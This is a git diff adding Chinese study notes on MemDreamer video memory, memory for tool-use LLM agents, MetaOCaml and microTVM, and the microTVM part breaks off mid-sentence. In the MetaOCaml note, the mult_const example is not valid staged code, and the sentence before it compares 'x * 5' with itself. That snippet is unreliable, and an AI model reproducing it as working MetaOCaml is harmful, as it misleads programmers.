self._follow_causal_edges(node) +``` + +### 示例 3:图节点的因果关系边构建 + +```python +class CausalEdge: + """表示因果关系:节点 A 导致了节点 B 的状态变化""" + def __init__(self, from_node, to_node, relation_type): + # relation_type: "caused_by", "preceded_by", "contradicts" 等 + self.from_node = from_node + self.to_node = to_node + self.relation_type = relation_type + +def build_causal_edges(foundation_nodes): + """自动检测视频中事件之间的因果关系""" + edges = [] + for i in range(len(foundation_nodes) - 1): + a = foundation_nodes[i] + b = foundation_nodes[i + 1] + + # 用视觉特征变化判断是否有关联 + similarity = cosine_similarity(a.features, b.features) + if similarity > 0.8: # 高度相似 → 可能因果相关 + edge = CausalEdge(a, b, "caused_by") + edges.append(edge) + a.edges.append(edge) + b.edges.append(edge) + + return edges +``` + +--- + +## 为什么这个方法有效? + +### 1. Token 开销极小 + +MemDreamer 推理时使用的上下文窗口只有完整视频内容的 **2%**。 + +为什么?因为它不需要看到每一帧。它通过三层图结构,先在高抽象层快速定位相关信息,再下钻到需要的细节层。 + +类比:你问"书里第三章提到了什么概念?"——你不会把整本书重读一遍,而是先翻目录找到第三章,再跳到那一章。 + +### 2. 精度大幅提升 + +在四个主流基准测试上,MemDreamer 达到了 **SOTA(最佳结果)**,与人类专家水平的差距仅 **3.7 分**(满分假设 100 的情况下)。 + +相比之前没有这种记忆机制的方法,准确率绝对提升了 **12.5 个百分点**。 + +### 3. 即插即用 + +MemDreamer 是一个**框架**,不是一个新的模型。你可以把它套在任何现有的视觉-语言模型外面,不需要重新训练模型本身。 + +--- + +## 重要发现:逻辑推理能力与长视频理解正相关 + +MemDreamer 的统计分析揭示了一个有趣的现象: + +> **一个 VLM 在逻辑推理任务上的表现,和它在长视频理解上的表现,呈强正相关。** + +这意味着什么? + +如果一个模型擅长"如果 A 发生,那么 B 会发生"这样的逻辑推理,它也会更擅长理解视频中的因果关系。MemDreamer 把这种能力**放大**了——通过给模型提供结构化的记忆,让它的推理能力可以真正发挥作用。 + +这建立了一个新范式:**智能体能力缩放(Agentic Capability Scaling)**。与其盲目增加模型参数,不如给模型更好的"思考工具"(如结构化记忆 + 检索机制)。 + +--- + +## 总结 + +MemDreamer 的核心贡献可以概括为三句话: + +1. **分层图记忆**:把长视频信息组织成三层图结构(基础图 → 摘要图 → 大纲图),像建索引一样让 AI"记住"视频内容 +2. **智能体检索**:用 O-R-A 循环让 AI 自主决定"接下来查什么",而不是被动接收所有信息 +3. **感知-推理解耦**:把"看"和"想"分开,推理时只使用 2% 的上下文,却获得 12.5% 的精度提升 + +--- + +## 思考题 + +1. 分层图记忆的结构,让你联想到数据库中的哪种索引技术?(提示:B+ 树、倒排索引……) +2. O-R-A 循环和 Agent 框架(如 ReAct)有什么异同? +3. 如果把这个方法用在你自己写的长文档摘要工具上,你会怎么设计那三层结构? diff --git a/src/content/docs/papers/memory-tool-use-agents.md b/src/content/docs/papers/memory-tool-use-agents.md new file mode 100644 index 000000000..e766a8660 --- /dev/null +++ b/src/content/docs/papers/memory-tool-use-agents.md @@ -0,0 +1,363 @@ +--- +title: When Does Memory Help Multi-Trajectory Inference for Tool-Use LLM Agents? +来源: 'Xinzhe Li & Yaguang Tao, "When Does Memory Help Multi-Trajectory Inference for Tool-Use LLM Agents?", arXiv:2605.28224, RMIT University, 2026' +日期: 2026-06-13 +子分类: 模型与训练 +分类: 机器学习 +provenance: pipeline-v3 +--- + +## 从日常类比开始:组队解谜,要不要共享笔记? + +想象你和四个朋友分头解同一道密室谜题,每人最多试五次,最后选**任意一人**的答案交卷。 + +- **各写各的(无记忆)**:每次从头摸索,A 已经发现「红钥匙开左门」,B 仍会再去试右门——浪费步数,但探索更分散。 +- **只写失败复盘(Reflection)**:A 失败后总结「别先查右柜,会触发警报」;B 读到后换策略。这对**需要树状回溯**的解法(像下围棋)特别有用,但对「各试各的、最后挑最好」的简单模式未必明显。 +- **只写环境事实(Fact Extraction)**:把「左柜有密码盘、表名是 Tournament_Results」记成原子事实;下一个人可以**跳过重复勘探**,步数变短,但容易大家都走同一条路。 +- **同一节点里兄弟之间耳语(Raw Sibling)**:在**同一步**展开多个候选动作时,后生成的候选能看到前面兄弟刚试过的动作和观察——适合束搜索这种「一步要并排看多个分支」的场景。 + +这篇论文(Li & Tao, arXiv:2605.28224)问的核心问题不是「记忆有没有用」,而是:**在什么推理策略、什么任务结构下,哪种记忆抽象才真正帮上忙?** 它用统一框架把 Reflexion、LATS、mem0 式事实提取等散落做法,放到同一张实验矩阵里对照。 + +--- + +## 是什么 + +**工具调用(tool-use)LLM Agent** 会在多步交互里发出结构化调用(SQL 查询、Shell 命令、知识图谱 API 等),读环境返回的 observation,再决定下一步。 + +**多轨迹推理(multi-trajectory inference)** 指:对同一任务生成**多条完整推理轨迹**,再从中选出最好的一条——类似 pass@k / best-of-N、束搜索(beam search)、蒙特卡洛树搜索(MCTS)。 + +**记忆增强** 在这些轨迹之间(或同一展开内的兄弟候选之间)传递信息,让后续尝试不必从零开始。 + +论文贡献可以概括为三件事: + +1. **统一框架**:沿两条正交轴分解记忆——**转移范围(scope)** 与 **内容抽象(abstraction)**。 +2. **系统实验**:4 种记忆 × 3 种推理策略 × 4 个基准(WikiSQL、WikiTQ、KGQA、Terminal-Bench),在 **verifier-free** 设定下评估(验证器只在评测时用,推理过程中没有「单元测试通过/失败」这类在线信号)。 +3. **三条结论(F1–F3)**:记忆收益强烈依赖推理策略;不同抽象在难任务上可能「效果相当」;事实提取常**不提高准确率**但显著**缩短轨迹**。 + +--- + +## 为什么重要 + +### 1. 过去的工作难以横向比较 + +Reflexion 用轨迹级反思、LATS 把反思嵌进 MCTS、mem0 类方法提取原子事实——它们往往在**单一任务 + 单一推理策略**下报告提升。你无法判断:增益来自「反思比事实好」,还是来自「MCTS 比 best-of-N 更适合吃这类记忆」。 + +### 2. 生产 Agent 大多是 verifier-free + +很多论文在推理时用 inline verifier(答案 exact match、测试是否通过)。真实部署里,Agent 通常**不知道**当前轨迹对不对,只能凭 observation 继续试。论文刻意对齐这种 regime,结论更贴近实际系统。 + +### 3. 环境是否可序列化(serializable)决定能用哪种搜索 + +若环境状态**不能 fork**(例如真实 Shell、已执行的破坏性 SQL),则 beam search / MCTS 不可行,只剩 **best-of-N** 类独立采样。记忆设计必须和**可用搜索算法**一起考虑。 + +### 4. 「加记忆」不免费 + +Reflection 要额外调用 augmentor LLM;Fact 提取也有成本。WikiSQL 上 LiTS-Fact 把平均步数从 6.1 降到 4.9,策略 token 成本从 $2.20 降到约 $1.68——**效率收益**和**探索多样性损失**需要权衡。 + +--- + +## 核心概念 + +### 1. 形式化:上下文增强器 + +策略从 \(\pi_\theta(a \mid s)\) 变为 \(\pi_\theta(a \mid s, \mathcal{C})\),其中: + +\[ +\mathcal{C} = \bigcup_{k=1}^{K} f_k(\mathcal{H}_k) +\] + +- \(\mathcal{H}_k\):第 \(k\) 个增强器能看到的**历史范围** +- \(f_k\):把历史**变换**成可注入 prompt 的文本(反思、事实、原始 observation 等) + +多个增强器可**组合**进同一条 prompt——论文发现组合并不总是更好(见下文「反思 vs 事实冲突」)。 + +### 2. 轴一:记忆范围(Scope) + +| 范围 | 含义 | 典型方法 | +|------|------|----------| +| **Cross-trajectory(跨轨迹)** | 完整轨迹结束后,把信息传给**下一次独立尝试** | Reflection、LiTS-Fact | +| **Cross-sibling(扩展内)** | 在同一搜索节点一次展开 \(N\) 个候选时,后采样的兄弟能看到**前面兄弟**的动作与观察 | Raw Sibling | + +### 3. 轴二:内容抽象(Abstraction) + +| 抽象级别 | 存什么 | 特点 | +|----------|--------|------| +| **Raw(原始)** | 工具返回的 observation 原文 | 信息最全,token 多 | +| **Reflection(反思)** | 自然语言总结:错在哪、下次怎么做 | 偏**程序性**计划,Agent 易「逐步照做」 | +| **Atomic facts(原子事实)** | 从轨迹抽出的短事实句 | 偏**陈述性**环境知识,利于跳过重复发现 | + +### 4. 四种具体记忆方法 + +| 方法 | Scope | Abstraction | 说明 | +|------|-------|-------------|------| +| **No Memory** | — | — | 基线:各轨迹独立采样 | +| **Reflection** | 跨轨迹 | 反思 | 类似 Reflexion / LATS 的 verbal memory | +| **LiTS-Fact** | 跨轨迹 | 原子事实 | 适配 mem0 流水线到多尝试搜索 | +| **Raw Sibling** | 扩展内 | 原始 observation | 论文新提出的 instantiation | + +### 5. 三种推理策略 + +| 策略 | 直觉 | 与记忆的典型关系 | +|------|------|------------------| +| **Best-of-N(Indep)** | 独立生成 N 条轨迹,选 PRM 最高 | 跨轨迹记忆有用;扩展内记忆**结构上不适用** | +| **Beam Search** | 每步保留 top-k 分支并行扩展 | 分支相似度高 → **多样性不足** → Raw Sibling 可能有用 | +| **MCTS** | 树搜索 + 回滚 + 价值估计 | 跨轨迹 Reflection 在难任务上**显著**;与 Raw Sibling 在 KGQA 上准确率可接近 | + +### 6. 三个基准环境(四类任务) + +- **WikiSQL / WikiTQ**:Text-to-SQL,环境相对可复用(表结构、列名)。 +- **KGQA**:知识图谱问答,更难,步数更长。 +- **Terminal-Bench**:CLI / Shell,环境常**不可序列化** → 许多搜索组合不可行。 + +--- + +## 三条核心发现(论文 F1–F3) + +### F1:记忆对准确率的影响取决于搜索方法 + +- **Reflection** 的统计显著提升主要出现在 **MCTS** 下,在 **best-of-N** 下往往不显著。 +- **Raw Sibling(扩展内注入)** 主要帮助 **多样性不足的 beam search**,对 MCTS 等其他策略帮助有限。 +- 同一记忆方法、同一批样本,换推理策略后结果可以**统计上显著不同**——推理策略是重要**混淆变量**。 + +### F2:不同抽象在难任务上可能「效果打平」 + +在 KGQA 的 MCTS 上,**Reflection** 与 **Raw Sibling** 准确率统计上**无法区分**,尽管一个用高抽象反思、一个用原始 observation。说明:在足够难的搜索里,「有跨尝试信息通道」本身可能比「通道里装的是反思还是 raw」更关键——至少在该设定下如此。 + +### F3:事实提取偏效率,不偏准确率 + +**LiTS-Fact** 在具有**可复用环境结构**的任务上,常**不提高** pass@k,但能把轨迹长度缩短约 **19–26%**。WikiSQL 上 77% 的后继尝试会跳过 `list_tables` 这类重复发现步骤(无记忆时仅约 4%)。 + +### 额外机制:反思 + 事实同时注入会「打架」 + +事实说「表 Tournament_Results 已有列 A,B,C」→ Agent 本可跳过列清单;反思说「Step 1: list tables」→ Agent **字面执行计划**,仍去 list tables。WikiSQL 上 skip 率从 77%(仅事实)跌到 20%(事实+反思),pass@5 也会下降。**显式程序性记忆会压制隐式环境知识。** + +--- + +## 代码示例 1:Best-of-N + 跨轨迹 Reflection(教学用骨架) + +下面用 Python 伪代码展示 **verifier-free best-of-N**:轨迹之间只传反思,最终用过程奖励模型(PRM)选最优,**推理过程中不调 oracle**。 + +```python +from dataclasses import dataclass, field +from typing import Any + + +@dataclass +class Trajectory: + steps: list[dict[str, Any]] = field(default_factory=list) + final_answer: str | None = None + prm_score: float = 0.0 + + +def run_tool(env, action: dict) -> dict: + """env 可以是 SQL 连接、KG API、mock shell 等。""" + return env.execute(action) + + +def reflect_on_trajectory(traj: Trajectory, llm) -> str: + """跨轨迹抽象:把失败/低效轨迹压成自然语言反思。""" + prompt = f""" + 任务已结束。轨迹步数={len(traj.steps)},最终答案={traj.final_answer!r}。 + 请用 3 条以内 bullet 总结:哪些工具调用是浪费的?下次应如何调整策略? + 轨迹摘要:{traj.steps[-8:]} + """ + return llm.complete(prompt) + + +def agent_step(state: str, memory: str, llm) -> dict: + """单步 tool-call:prompt = 系统记忆 + 当前 observation。""" + system = f"跨轨迹记忆(反思):\n{memory}\n" if memory else "" + return llm.choose_tool(system + state) + + +def best_of_n_with_reflection(task: str, env, llm, prm, n: int = 5) -> Trajectory: + memory = "" + trajectories: list[Trajectory] = [] + + for attempt in range(n): + state = task + traj = Trajectory() + + while not env.done(state): + action = agent_step(state, memory, llm) + obs = run_tool(env, action) + traj.steps.append({"action": action, "obs": obs}) + state = env.render(state, obs) + + traj.final_answer = env.extract_answer(state) + traj.prm_score = prm.score(task, traj) # 仅用于选优,非 inline verifier + trajectories.append(traj) + + # 跨轨迹:下一条尝试读取上一轮的 verbal reflection + memory = reflect_on_trajectory(traj, llm) + + return max(trajectories, key=lambda t: t.prm_score) +``` + +**读代码时注意**: + +- `memory` 在**每条轨迹结束后**才更新 → 典型的 **cross-trajectory + reflection**。 +- `prm.score` 模拟论文里的过程奖励模型选轨迹;它**不是** SQL 执行结果的对错标签(那会是 inline verifier)。 +- 论文结论:这种 Reflection 在 **best-of-N** 上提升常不显著;若换成 **MCTS + 回滚**,同一反思机制更容易显出收益(F1)。 + +--- + +## 代码示例 2:Scope × Abstraction 组合器 + Beam 扩展内 Raw Sibling + +第二个例子展示论文公式 (1) 的**可组合增强器**,并实现 **Raw Sibling**:同一父节点展开多个候选时,后生成的候选看到前面兄弟的 `(action, observation)`。 + +```python +from abc import ABC, abstractmethod + + +class ContextAugmentor(ABC): + @abstractmethod + def analyze(self, history) -> str: + ... + + +class ReflectionAugmentor(ContextAugmentor): + """Scope: cross-trajectory | Abstraction: reflection""" + + def __init__(self, past_trajectories: list): + self.past_trajectories = past_trajectories + + def analyze(self, history) -> str: + if not self.past_trajectories: + return "" + last = self.past_trajectories[-1] + return f"[Reflection] 上一轮共 {len(last)} 步,避免重复无效工具调用。" + + +class FactAugmentor(ContextAugmentor): + """Scope: cross-trajectory | Abstraction: atomic facts (LiTS-Fact 简化版)""" + + def __init__(self, facts: list[str]): + self.facts = facts + + def analyze(self, history) -> str: + if not self.facts: + return "" + return "[Facts]\n" + "\n".join(f"- {f}" for f in self.facts) + + +class RawSiblingAugmentor(ContextAugmentor): + """Scope: within expansion | Abstraction: raw (action, obs) pairs""" + + def __init__(self, siblings: list[tuple[dict, dict]]): + self.siblings = siblings # 当前节点已采样兄弟的 (action, observation) + + def analyze(self, history) -> str: + if not self.siblings: + return "" + lines = [] + for i, (a, o) in enumerate(self.siblings, 1): + lines.append(f"兄弟#{i} action={a} obs={o}") + return "[Sibling context]\n" + "\n".join(lines) + + +def build_prompt(state: str, augmentors: list[ContextAugmentor], histories) -> str: + chunks = [aug.analyze(histories[i]) for i, aug in enumerate(augmentors)] + context = "\n\n".join(c for c in chunks if c) + return f"{context}\n\n当前状态:{state}" if context else state + + +def beam_expand(parent_state, env, llm, beam_width: int = 3): + """束搜索一步:后采样候选注入 Raw Sibling 记忆。""" + candidates = [] + siblings: list[tuple[dict, dict]] = [] + + for _ in range(beam_width): + prompt = build_prompt( + parent_state, + augmentors=[RawSiblingAugmentor(siblings)], + histories=[siblings], + ) + action = llm.choose_tool(prompt) + obs = env.execute(action) + siblings.append((action, obs)) # 下一个兄弟能看到之前的 + next_state = env.render(parent_state, obs) + candidates.append((next_state, obs, llm.score_state(next_state))) + + return sorted(candidates, key=lambda x: x[2], reverse=True)[:beam_width] +``` + +**设计对照表**(与论文 Table 9 思想一致): + +| 配置 | 探索多样性 | 跳过重复发现 | +|------|------------|--------------| +| 无记忆 | 高(i.i.d. 采样) | 低 | +| LiTS-Fact 全注入 | 降低(事实被当 ground truth) | 高 | +| Raw Sibling + Beam | 在**步内**差异化兄弟 | 中等 | + +论文强调:**检索式**「只注入相似事实」难以同时保多样性与高效率——Pareto 前沿很窄;他们的 LiTS-Fact 走「全注入、高效率、低多样性」一端。 + +--- + +## 实验矩阵怎么读 + +论文评估的是 **memory × inference × benchmark** 单元格,部分组合因环境不可序列化而**结构性不可行**(Table 2 中 † 标记)。 + +| 维度 | 取值 | +|------|------| +| 记忆 | No Memory / Reflection / LiTS-Fact / Raw Sibling(及 Fact+Refl 组合) | +| 推理 | Best-of-N / Beam / MCTS | +| 任务 | WikiSQL(51) / WikiTQ(49) / KGQA(150 或 69 子集) / Terminal-Bench(89) | + +**效率侧数据(Appendix P,best-of-N)**: + +- WikiSQL 平均步数:No Memory 6.1 → LiTS-Fact 4.9;跳过 list_tables:4% → 77%。 +- 成本:Reflection 因 augmentor 调用,总成本高于纯策略;Fact 在步数减少后**策略侧**更省。 + +整实验 API 成本约 **$1,384**(Bedrock 定价,Haiku/Sonnet 分工)。 + +--- + +## 给工程实践的 checklist + +在给你的 tool-use Agent 加「多轨迹记忆」之前,可以按论文结论自问: + +1. **推理策略是什么?** 若只有 best-of-N,别指望 Reflexion 式反思一定涨点;若用 MCTS,跨轨迹反思更值得试。 +2. **环境能否 fork?** 不能则别设计依赖 beam/MCTS 的方案;记忆应服务**独立多次尝试**。 +3. **任务有没有可复用的环境结构?** 有(SQL schema、固定 API 面)→ 事实提取可能**省 token/步数**;无则记忆偏「避错」而非「跳过发现」。 +4. **beam 是否多样性不足?** 是 → 考虑扩展内 Raw Sibling;否 → 收益可能不明显。 +5. **是否混用反思与事实?** 小心显式计划覆盖环境事实,导致重复工具调用。 +6. **是否 verifier-free?** 在线没有单元测试/答案校验时,论文设定更贴你的生产路径;别直接照搬带 inline verifier 的旧结论。 + +--- + +## 与相关工作的关系(简表) + +| 方向 | 代表工作 | 本文差异 | +|------|----------|----------| +| 树搜索推理 | Tree-of-Thoughts, RAP, ReST-MCTS* | 聚焦**记忆抽象 × 搜索策略**交互,非新搜索算法 | +| verbal 反思 | Reflexion, LATS | 统一进 scope×abstraction,并测 **何时** 显著 | +| 原子事实 | mem0, Holt et al. | LiTS-Fact + 与 Reflection 的**对照**与**组合**分析 | +| 不可序列化环境 | Zainullina et al. 2025 | 解释为何某些 benchmark 只能 best-of-N | + +框架还可视为 RL **experience replay** 的推理期类比:经验不用于梯度,而是**写进 prompt**(in-context learning / hindsight 的一种形式)。 + +--- + +## 局限与开放问题 + +- **单一策略 LLM 族**:SQL 用 Haiku、KG 用 Sonnet;跨模型结论需谨慎外推。 +- **Fact 检索策略**:论文主要评「全注入」;相似/相异检索仅为设计空间分析,未全量实验。 +- **组合增强器**:Fact+Reflection 已显示冲突;更一般的组合规则仍开放。 +- **负向事实**(「某表不存在」)与 **candidate-vs-truth framing** 被提出作为缓解多样性–效率权衡的方向,需后续验证。 + +--- + +## 一句话总结 + +**记忆不是 tool-use Agent 多轨迹推理的万能插件:Reflection 更像给 MCTS 的「错题本」,LiTS-Fact 更像 SQL 任务的「环境速查表」,Raw Sibling 是给「步子太像的束搜索」加的「兄弟耳语」——先选对推理策略,再选记忆抽象,比堆更多记忆类型更重要。** + +--- + +## 延伸阅读 + +- 论文 HTML:[arXiv:2605.28224](https://arxiv.org/html/2605.28224) +- Reflexion(跨轨迹反思原型):Shinn et al., 2023 +- LATS(MCTS + 反思):Zhou et al., 2024 +- 不可序列化环境与轨迹选择:Zainullina et al., 2025 +- mem0(原子事实提取流水线):Chhikara et al., 2025 diff --git a/src/content/docs/papers/metaocaml-2003.md b/src/content/docs/papers/metaocaml-2003.md new file mode 100644 index 000000000..bbcd89cc9 --- /dev/null +++ b/src/content/docs/papers/metaocaml-2003.md @@ -0,0 +1,159 @@ +--- +title: MetaOCaml: A Compiled, Type-Safe, Multi-Stage Programming Language +来源: https://okmij.org/ftp/ML/MetaOCaml.html +日期: 2026-06-13 +分类: 编程语言 +子分类: 类型与 PL 理论 +provenance: pipeline-v3 +--- + +# MetaOCaml:一个编译型、类型安全的多阶段编程语言 + +## 什么是"多阶段编程"? + +想象你在写一份菜谱。 + +**普通编程**就像直接照着菜谱做菜:给个数字,算出结果。比如 `x 的 7 次方`,你给它 x=3,它告诉你 2187。 + +**多阶段编程**就像你先写一个"通用菜谱生成器"——这个生成器知道某道菜每次都要做 7 次方,于是它提前把 7 次方的步骤全部算好,生成了一个专门的、精简的菜谱。拿到这个新菜谱后再做菜,省去了所有不必要的判断和循环。 + +多阶段编程的核心思想就是:**把程序分成多个"阶段"运行,在早期阶段(编译期/生成期)做更多计算,在后期阶段(运行期)跑得更更快。** + +MetaOCaml 是 OCaml 语言的一个扩展,它让这种"写生成程序的程序"变得**类型安全**——你生成的代码绝对不会因为类型错误而崩溃。 + +## 两个核心构造:括号和逃逸 + +MetaOCaml 只加了两个新语法,就能玩起多阶段编程: + +| 语法 | 名称 | 作用 | 通俗理解 | +|------|------|------|----------| +| `.\< e \>.` | 括号(bracket / quasi-quote) | 把 `e` 打包成"未来的代码" | 把步骤写进一个盒子,不急着做 | +| `.~e` | 逃逸(escape) | 在括号内计算 `e`,把结果嵌进去 | 现在算好,塞进盒子的对应位置 | + +还有一个 `.\<\>.` 类型:`int code` 表示"这段代码算出来是个 int"。 + +## 经典例子:7 次方 + +这是论文里反复用的例子,先看不分阶段的普通版本: + +```ocaml +let square x = x * x +let rec power n x = + if n = 0 then 1 + else if n mod 2 = 0 then square (power (n/2) x) + else x * (power (n-1) x) +``` + +`power 7 x` 每次调用都要判断"n 是 0 吗?是偶数吗?"——这些判断对 `7` 这个固定值来说纯属浪费。 + +MetaOCaml 版本: + +```ocaml +let rec spower n x = + if n = 0 then .\<1\>. + else if n mod 2 = 0 then .\. + else .\<.~x * .~(spower (n-1) x)\>. +``` + +注意类型变了:`int -> int code -> int code`。返回值不再是整数,而是"一段算整数的代码"。 + +调用方式: + +```ocaml +let spower7_code = .\ .~(spower 7 .\.)\>. +(* 生成的代码长这样: + fun x_1 -> x_1 * (square (x_1 * (square (x_1 * 1)))) +*) +``` + +看!生成的代码里完全没有递归、没有判断,就是一连串乘法。`power` 里有 6 个递归调用,`spower7` 里全变成了直接的乘法。 + +要真正运行这段代码,用 `run` 函数把它编译并链接回主程序: + +```ocaml +open Runcode +let spower7 = run spower7_code +(* spower7 3 = 2187 *) +``` + +## 关键概念一览 + +**代码值(code value)**:第一段程序生成的"代码片段"。它本身不是结果,而是一段还没跑的程序。类型是 `'a code`。 + +**纯生成性(pure generativity)**:你只能"组装"代码,不能"拆开"看它的内部。这让类型系统能做出强保证——生成的代码一定是合法的。 + +**类型安全保证**:一个通过 MetaOCaml 类型检查的生成器,**一定**只会生成能编译的代码。这不是事后测试出来的,是类型系统保证的。 + +**跨阶段持久值(CSP, Cross-Stage Persistence)**:在生成代码时引用了当前阶段定义的函数(比如 `square`),MetaOCaml 会用 `csp_square_3` 这样的标记引用它,后续编译时能正确链接。 + +**offshoring(离岸编译)**:生成的代码可以翻译成 C 代码。比如上面的 `spower7_code` 能生成: + +```c +int power7(int const x_1) { + return (x_1 * sqr(x_1 * sqr(x_1 * 1))); +} +``` + +**多阶段嵌套**:括号可以嵌套——你可以写"生成代码的代码",甚至"生成生成代码的代码"。理论上有任意多层。 + +## 代码示例 2:让常量乘法更快 + +实际编程中,`x * 5` 比 `x * 5` 做完整乘法指令更快——可以展开成 `x + x + x + x + x` 或者利用移位。MetaOCaml 的 `mult.ml` 例子展示了如何用多阶段编程在运行时"特化"一个常量乘法器: + +```ocaml +(* 把常量乘法的逻辑"生成"出来,而不是运行时算 *) +let rec mult_const c x = + if c = 0 then .\<0\>. + else if c = 1 then .~x + else if c mod 2 = 0 then + .\< .~(mult_const (c/2) .~x) * .\<2\>. \>. + else + .~x * .~(mult_const (c-1) x) +``` + +调用 `mult_const 5` 生成一段代码,这段代码里 `x * 5` 已经被优化成加法/移位组合了。 + +## 与普通宏系统的区别 + +很多语言都有宏(C 的 `#define`、Rust 的 `macro`、Racket 的 `syntax-rules`),但 MetaOCaml 和它们有本质不同: + +| | C 宏 / 文本替换 | MetaOCaml | +|---|---|---| +| 类型安全 | 没有 | 编译时保证 | +| 变量作用域 | 容易冲突(宏变量泄漏) | 词法作用域自动管理(hygiene) | +| 错误消息 | 生成后报一堆看不懂的错 | 在**生成器**里报错,好定位 | +| 能返回函数 | 困难 | 一等公民,`'a -> 'b code` | +| 能嵌套阶段 | 不行 | 任意多层 | + +## 三种实现方式的对比 + +论文还分析了三类给语言加多阶段支持的方法: + +**方法 1:直接在 AST 里加 staging 形式**。修改解析器、类型检查器、中间语言和代码生成器。改的东西太多,等于重写语言。 + +**方法 2:预处理成代码组合子(code combinators)**。比如把 `.\.` 翻译成 `add (mul x y) (int 1)`。好处是不用改 OCaml 本体,坏处是处理 polymorphic let、模式匹配很麻烦。Scala 的 LMS(Lightweight Modular Staging)走的类似路线。 + +**方法 3:类型检查后再翻译(MetaOCaml 的选择)**。先按带括号的规则做类型检查,确保多态 let 等构造正确;类型检查完再把括号去掉,翻译成中间表示。这样 OCaml 的后端优化器和代码生成器可以完全复用。改动极小——最新版只改了 5 个 OCaml 文件。 + +## 安装与版本 + +当前版本 N153 基于 OCaml 5.3.0。通过 OPAM 安装: + +```bash +opam update +opam switch create 5.3.0+BER +eval `opam config env` +``` + +MetaOCaml 与 OCaml 几乎完全向后兼容——去掉所有 staging 标注后就是普通 OCaml。 + +## MetaOCaml 的现实应用 + +- 编译领域特定语言(DSL),比如图像处理查询 +- 自动生成高性能数值计算内核 +- 数据流优化中的"流融合"(stream fusion) +- 编译 FFT、高斯消元等算法的变体 + +## 一句话总结 + +MetaOCaml 说:"你不用在**写代码**和**写生成代码的工具**之间二选一——你写的每段 OCaml 代码都天然支持生成其他 OCaml 代码,而且类型系统保证你生成的东西一定跑得通。" diff --git a/src/content/docs/papers/microtvm-2020.md b/src/content/docs/papers/microtvm-2020.md new file mode 100644 index 000000000..b9511fc1a --- /dev/null +++ b/src/content/docs/papers/microtvm-2020.md @@ -0,0 +1,312 @@ +--- +title: microTVM — 把 TVM 编译器搬到微控制器上的 bare-metal ML 栈(学习笔记) +来源: https://tvm.apache.org/docs/topic/microtvm/index.html +日期: 2026-06-13 +分类: 操作系统 +子分类: 嵌入式与 IoT +provenance: pipeline-v3 +--- + +## 先想成什么事 + +想象你在一家**连锁烘焙店**总部,要把同一套「识别面包是否烤焦」的神经网络,部署到全球几千家**只有一口小烤箱、没有后厨经理**的街边档口: + +- 每家档口的**灶台型号**不同(Cortex-M3/M4/M7、RISC-V、有无 FPU、Flash 只有 512 KB~2 MB)。 +- 档口**不能运行时打电话要内存**——没有 `malloc`,常常没有完整操作系统,只有裸机或轻量 RTOS。 +- 但总部希望**不只靠解释器逐层放映**,而是像专业中央厨房一样:**提前把菜谱编译成可直接下锅的半成品**,还能针对每家店的烤箱做**自动调参**(autotuning)。 + +**microTVM** 就是 Apache TVM 为这种场景做的扩展:在**只依赖 C 标准库**的 bare-metal 设备上,把 Relay/TFLite 等前端模型**编译成 C 源码或目标文件**,配合极简 **C Runtime(CRT)** 和 **Project API** 生成可烧录固件;同时可在设备上跑 **TVM RPC 服务**,让主机端驱动推理或自动调优。 + +它与 [TensorFlow Lite Micro](./tflite-micro-2021.md) 解决同一类 TinyML 问题,但路线不同:TFLM 强调**解释器 + FlatBuffer**;microTVM 强调**编译器优化 + 代码生成 + TVM 全栈复用**(AutoTVM / Meta Schedule、CMSIS-NN 等 BYOC 内核)。 + +## microTVM 到底是什么 + +根据 [官方文档](https://tvm.apache.org/docs/topic/microtvm/index.html),microTVM 由三块能力组成: + +| 组件 | 作用 | +|------|------| +| **编译器扩展** | 让 `tvm.relay.build` 能针对 `tvm.target.micro(...)` 生成可在 MCU 上链接的 C/LLVM 产物 | +| **设备端 RPC** | 在板子上跑精简 TVM RPC server,主机通过 UART 等通道下发算子、做 autotuning | +| **CRT 运行时** | 极简 C 运行时(`Runtime("crt")`),替代桌面 TVM 常用的动态 C++ Runtime | + +典型工作流(与官方 workflow 图一致)可记成: + +``` +训练/导出模型 (TFLite / ONNX / PyTorch→Relay) + → Relay 前端 + 量化/剪枝 + → relay.build(target=micro, runtime=crt, executor=aot|graph) + → Model Library Format (MLF) 目录/压缩包 + → Project API 套入 Zephyr / Arduino / CRT 模板工程 + → 交叉编译 + 烧录 + → Host-Driven(主机 Graph/AOT Executor 经 RPC 驱动)或 Standalone(设备自包含推理) +``` + +## 为什么需要 microTVM + +MCU 上的 ML 部署有三条常见路线,microTVM 站在「**编译器派**」: + +| 路线 | 代表 | 强项 | 弱项 | +|------|------|------|------| +| 解释器 | TFLite Micro | 换模型常只需换 Flash 里的数组 | 优化深度受解释调度限制 | +| 厂商 SDK | CMSIS-NN 手写调用 | 单算子极快 | 整图手工拼接成本高 | +| **编译器** | **microTVM** | 整图融合、调度搜索、多前端 | 工具链与板级集成更复杂 | + +microTVM 的价值在于:**复用 TVM 在服务器/GPU 上验证过的编译与调优基础设施**,把「为这颗 STM32 手写卷积循环」变成「声明 target + 跑 build + 选 executor」。 + +## 核心概念 + +### 1. Micro Target + +`TARGET = tvm.target.target.micro("host")` 可在 x86 上用 CRT **模拟** MCU 环境;真板子则传入板级 model 字符串,例如 Zephyr 的 `nucleo_f746zg`: + +```python +import tvm + +# 主机仿真:不连硬件也能跑通 pipeline +TARGET_HOST = tvm.target.target.micro("host") + +# 物理板:从 boards.json 读取 SoC 描述(Zephyr 模板) +# TARGET = tvm.target.target.micro(boards["nucleo_l4r5zi"]["model"]) +``` + +Target 告诉编译器:可用内存、是否禁用向量指令、交叉编译器前缀等——**同一 Relay 图,换 target 就换「为哪家烤箱写的菜谱」**。 + +### 2. CRT Runtime 与 Executor 选择 + +microTVM **应使用 C Runtime**,不要用桌面默认的 C++ Runtime: + +| 选项 | 含义 | 适用场景 | +|------|------|----------| +| `Runtime("crt", {"system-lib": True})` | 静态链接、函数注册表在编译期确定 | 几乎所有 microTVM 部署 | +| `Executor("aot")` | Ahead-of-Time:图编译成单个 `run()`,**预先规划内存** | 部署首选;比 Graph 少运行时解析 JSON | +| `Executor("graph", {"link-params": True})` | 保留 `graph.json`,由 GraphExecutor 调度 | Host-Driven 实验、与 AutoTVM 集成 | + +设计文档指出:**GraphExecutor 的 Standalone 模式内存效率一般**;生产更推荐 **AOT + 预分配 workspace**。 + +常见 Pass 配置(MCU 无 SIMD 时要关向量化): + +```python +with tvm.transform.PassContext(opt_level=3, config={"tir.disable_vectorize": True}): + module = tvm.relay.build( + relay_mod, + target=TARGET, + params=params, + runtime=RUNTIME, + executor=EXECUTOR, + ) +``` + +### 3. Model Library Format (MLF) + +`relay.build` 返回的 